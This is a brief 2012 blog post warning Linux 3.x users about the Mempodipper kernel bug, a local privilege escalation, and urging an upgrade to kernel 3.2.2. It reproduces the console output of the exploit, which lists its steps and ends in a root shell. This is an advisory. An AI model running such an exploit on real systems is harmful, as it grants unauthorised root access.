Friday, January 27, 2012

Mempodipper Bug

For those who's using Linux Kernel 3.x, there's a serious bug in the Linux Kernel which can be misued to have a local privilege escalation via suid which is well explained on this site.

The solution is quite easy: all you need is to upgrade to the latest Linux Kernel 3.2.2 and you should be safe.

Here's what you will get when you are running a vulnerable kernel:
bash-4.1$ ./mempodipper
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3765/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x80499e8.
[+] Calculating su padding.
[+] Seeking to offset 0x80499dc.
[+] Executing su with shellcode.
sh-4.1# id
uid=0(root) gid=0(root)

Quite nasty huh? So what are you waiting for? Go to the kernel site and grab the latest version (3.2.2 at minimum)